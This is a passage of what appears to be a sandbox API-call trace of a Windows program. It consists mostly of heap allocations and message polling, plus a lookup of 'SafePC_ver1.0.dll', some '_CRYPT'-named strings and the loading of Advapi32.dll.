[0205.267] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0205.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0205.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0205.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0205.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0205.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0205.268] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0205.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0205.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0205.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0205.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0205.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0205.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0205.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0205.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0205.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0205.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0205.270] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/SafePC_ver1.0.dll", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd42a9d0f, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd42a9d0f, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd42cff4e, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="SafePC_ver1.0.dll", cAlternateFileName="SAFEPC~1.DLL")) returned 0xa86f90 [0205.271] FindClose (in: hFindFile=0xa86f90 | out: hFindFile=0xa86f90) returned 1 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.271] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0205.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0205.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0205.272] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0205.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0205.272] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0205.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0205.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0205.272] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0205.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0205.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0205.272] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0205.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0205.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0205.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0205.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0205.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0205.273] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0205.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0205.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0205.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0205.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0205.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0205.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0205.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.274] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.274] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0205.274] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.274] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.274] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0205.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0205.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0205.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0205.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0205.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0205.275] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0205.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0205.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0205.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.275] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0205.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0205.276] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0205.276] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0205.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0205.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0205.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0205.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0205.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0205.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.277] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.277] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 